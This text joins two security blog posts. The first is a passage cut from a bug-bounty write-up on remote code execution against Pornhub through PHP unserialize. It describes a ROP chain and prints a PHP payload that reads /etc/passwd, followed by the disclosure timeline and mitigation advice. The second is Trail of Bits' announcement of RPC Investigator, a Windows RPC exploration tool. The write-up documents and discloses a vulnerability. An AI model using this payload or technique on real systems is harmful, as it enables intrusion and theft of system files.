Because the stack pivot contained a pop %r13 and pop %r14 the 0xdeadbeef padding inside the remaining chain was necessary to continue with setting RDI. As the first parameter to zend_eval_string RDI is required to reference the code that is to be executed. This code is located right after the ROP chain. It was also required to keep sending the exact same amount of data between each request so that all calculated offsets stayed correct. This was achieved by setting up different paddings wherever it was necessary.

The next step was to finally trigger code execution by returning back into the PHP interpreter. Actually, other techniques like return2libc are quite applicable as well but create a few other problems that are easier dealt with when staying in PHP context.

Returning into PHP

Being able to execute arbitrary PHP code is an important step, but being able to view its output is equally important, unless one wants to deal with side channels to receive responses. So the remaining tricky part was to somehow display the result on Pornhub’s website.

Clean termination of PHP

Usually php-cgi forwards the generated content back to the web server so that it’s displayed on the website, but wrecking the control flow that badly creates an abnormal termination of PHP so that its result will never reach the HTTP server. To get around this problem we simply told PHP to use direct unbuffered responses that are usually used for HTTP streaming:

my $php_code = 'eval(\'
    header("X-Accel-Buffering: no");
    header("Content-Encoding: none");
    header("Connection: close");
    error_reporting(0);
    echo file_get_contents("/etc/passwd");
    ob_end_flush();
    ob_flush();
    flush();
\');';

This finally allowed us to directly fetch every output the PHP payload generated without having to worry about the cleanup routines that are usually involved when the CGI process sends data to the web server. This further increased the stealthiness factor by minimizing the number of potential errors and crashes.

To summarize, our payload contained a fake object with its add_ref function pointer pointing to our first ROP gadget. The following diagram visualizes this concept:

Together with our ROP stack which was provided over POST data our payload did the following things:

  1. Created our fake object which was later on passed as a parameter to “setcookie”.
  2. This caused a call to the provided add_ref function i.e. it allowed us to gain program counter control.
  3. Our ROP chain then prepared all registers/parameters as discussed.
  4. Next, we were able to execute arbitrary PHP code by making a call to zend_eval_string.
  5. Finally, we caused a clean process termination while also fetching the output from the response body.

Once running the above code we were in and got a nice view of Pornhub’s ‘/etc/passwd’ file. Due to the nature of our attack we would have also been able to execute other commands or actually break out of PHP to run arbitrary syscalls. However, just using PHP was more convenient at this point. Finally, we dumped a few details about the underlying system and immediately wrote and submitted a report to Pornhub over Hackerone.

Timeline

Here is the timeline of the disclosure process:

  • 2016-05-30 Hacked Pornhub and submitted the issue over Hackerone. Hours later Pornhub quickly fixed the issue by removing calls to unserialize
  • 2016-06-14 Received a reward of $20,000
  • 2016-06-16 Submitted issues to bugs.php.net
  • 2016-06-21 Both bugs got fixed in PHP’s security repository
  • 2016-06-27 Received Hackerone IBB reward of $2,000 ($1,000 for each vulnerability)
  • 2016-07-22 Pornhub resolved the issue on Hackerone

Conclusion

We gained remote code execution and would’ve been able to do the following things:

  • Dump the complete database of pornhub.com including all sensitive user information.
  • Track and observe user behavior on the platform.
  • Leak the complete available source code of all sites hosted on the server.
  • Escalate further into the network or root the system.

Of course none of the above things were done and very careful attention was paid to respect the scope and limitations of the bug bounty program.
Further, we were able to find two zero day vulnerabilities in PHP’s garbage collection algorithm. Those vulnerabilities, although being in a very different PHP context, could be reliably and remotely exploited in an unserialize context, too.

It is well-known that using user input on unserialize is a bad idea. In particular, about 10 years have passed since its first weaknesses have become apparent. Unfortunately, even today, many developers seem to believe that unserialize is only dangerous in old PHP versions or when combined with unsafe classes. We sincerely hope to have destroyed this misbelief. Please finally put a nail into unserialize’s coffin so that the following mantra becomes obsolete.

You should never use user input on unserialize. Assuming that using an up-to-date PHP version is enough to protect unserialize in such scenarios is a bad idea. Avoid it or use less complex serialization methods like JSON.

The newest PHP versions contain fixes by now. Hence, you should update your PHP 5 and PHP 7 versions accordingly.

Many thanks to the Pornhub team for:

  • Very polite and competent responses.
  • Actually caring about security (and not just pretending like many other companies do nowadays).
  • Being very generous regarding the bounty of $20,000.
    According to Sinthetic Labs’s Public Hackerone Reports last update we are grateful to see that this submission seems to be heads on with the ShellShock vulnerability submission for being one of the highest paid public bounties on Hackerone so far.

Further, many thanks go out to the PHP developers for quickly deploying the fix and the Internet Bug Bounty committee for awarding us with $2,000.

Finally, we want to highlight the necessity of such programs. As you can see, offering high bug bounties can motivate security researchers to find bugs in underlying software. This positively impacts other sites and unrelated services as well.

Please don’t forget to checkout our two other write-ups regarding the PHP bugs and their discovery.

Introducing RPC Investigator

Introducing RPC Investigator

Original text by Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the renowned attack surface its implementers afford to exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there’s always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on Github.

Background

Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

A few years ago, the developer of the open source .NET library NtApiDotNet, James Foreshaw, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post—focusing on using the new 

NtApiDotNet
 functionality via powershell scripts and cmdlets in his 
NtObjectManager
 package—he included a small section on how to use the powershell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the 

NtApiDotNet
 platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integration of symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from 
    NtApiDotNet
    , we can build a more complete picture of ongoing RPC activity.

Features

Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking 

Edit -&gt; Settings
. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, you can specify the path 
srv*c:\symbols*https://msdl.microsoft.com/download/symbols
).

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user’s application data folder, which is typically 

C:\Users\(user)\AppData\Roaming\RpcInvestigator
. To view this folder, simply navigate to 
View -&gt; Logs
. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (which is most likely none).

Searching for RPC servers

The first thing you’ll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the 

File -> All RPC ALPC Servers…
 menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC) by parsing the server’s image by selecting 

File -&gt; Load from binary…
 and locating the image on disk, or by selecting 
File-&gt;Load from service…
 and selecting the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item 

Library -> Servers
 to view all discovered RPC servers and 
Library -> Procedures
 to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for “()” to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to 

Library -&gt; Refresh
, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded and I suspect Microsoft’s public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly-discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item 

Library -&gt; Erase
 or manually delete the database file (
rpcserver.db
) inside the current user’s roaming application data folder. Note that RPC servers that are discovered by using the 
File -&gt; Load from binary…
 and 
File -&gt; Load from service…
 menu items are automatically added to the library.

You can also export the entire library as text by selecting 

Library -&gt; Export as Text
.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library servers or procedures tab and select 

New Client
.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by 

NtApiDotNet
. The code has been modified to include a “Run” function, which is the “entry point” for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets and an application can consume those events to diagnose performance issues.

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to 

Tools -&gt; RPC Sniffer…
 and click the “play” button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select 
    Open in library
     or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”